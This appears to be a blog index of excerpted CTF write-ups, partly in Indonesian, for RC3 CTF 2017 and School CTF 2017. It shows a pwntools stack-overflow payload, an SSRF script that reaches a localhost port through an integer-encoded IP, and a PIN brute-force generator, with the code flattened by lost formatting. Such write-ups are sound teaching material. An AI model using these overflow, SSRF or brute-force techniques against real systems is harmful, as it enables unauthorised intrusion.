RC3 CTF 2017 - Write Up

v2 = 0; v1 = 0; printf(“Enter Key: “); gets((char *)&v0); if ( v2 == 0xCAFEF00D && v1 == 0xC0FFEE ) sub_80484EF(); puts(“Error: Invalid key!"); srand(1u); init(); } baby=remote("18.216.183.46",4200)p="“p+="A"*16p+=p32(0xC0FFEE)# v1p+=p32(0xCAFEF00D)# v2baby.sendlineafter(”: “,p)printbaby.
Read more →

RC3 CTF 2017 Write Up

Reversing (100) Diberikan file elf 64bit not stripped. $ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar. $ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :) Flag : RC3-2017{little_ball_of_fur} Web (100) Diberikan sebuah website http://13.59.6.98 $ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
Read more →

RC3 CTF 2017 Write Up

Reversing (100) Diberikan file elf 64bit not stripped. $ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar. $ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :) Flag : RC3-2017{little_ball_of_fur} Web (100) Diberikan sebuah website ()[http://13.59.6.98] $ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
Read more →

School CTF 2017 - Write Up

Task URLCan you find it? Task URLdefip2long(ip): aton =inet_aton(ip) returnunpack(”!L",aton)[0] defmain(): URL ="http://portscan.task.school-CTF.org/port"IP ="127.0.0.1"HOST =ip2long(IP) PORT ="31337"print"Host : {}“.format(HOST) r =requests.post(URL,data={"host": HOST,"port": PORT}) raw_content =r.content flag =re.findall("SchoolCTF{.*?}“,raw_content) print"Flag : {}“.format(flag[0]) if__name__==’main‘: main() p.s. It seems that one of them said that they haven’t yet fully configured the security system and the password can be cracked. Safe URLdefa(pin): if(int(pin[0]) +int(pin[1]) +int(pin[2])) %10==int(pin[3]): returnpin else: returnNonepin_list =[] prod_pin =product("123456789",repeat=4) prod_pin =["“.join(x) forx inlist(prod_pin)] prod_pin =map(a,prod_pin) prod_pin =filter(None,prod_pin) prod_pin =list(set(prod_pin)) pin_list+=prod_pin
Read more →

School CTF 2017 Write Up

Task URLSitus tersebut menggunakan self signed ssl, dan Flag nya terdapat pada bagian Organizational unit (OU). Flag : SchoolCTF{n0t_so+$eCur3}Can you find it? Task URLWeb tersebut menyediakan fasilitas scan port. dimana terdapat 2 fitur, yang pertama ‘Scan the host to get the list of open ports’ terlihat port 31337 dengan service SchoolCTF Flag Serverdalam keadaan Open. Yang kedua “Identify the single port on the host” Tetapi apabila me scan “localhost” atau “127.
Read more →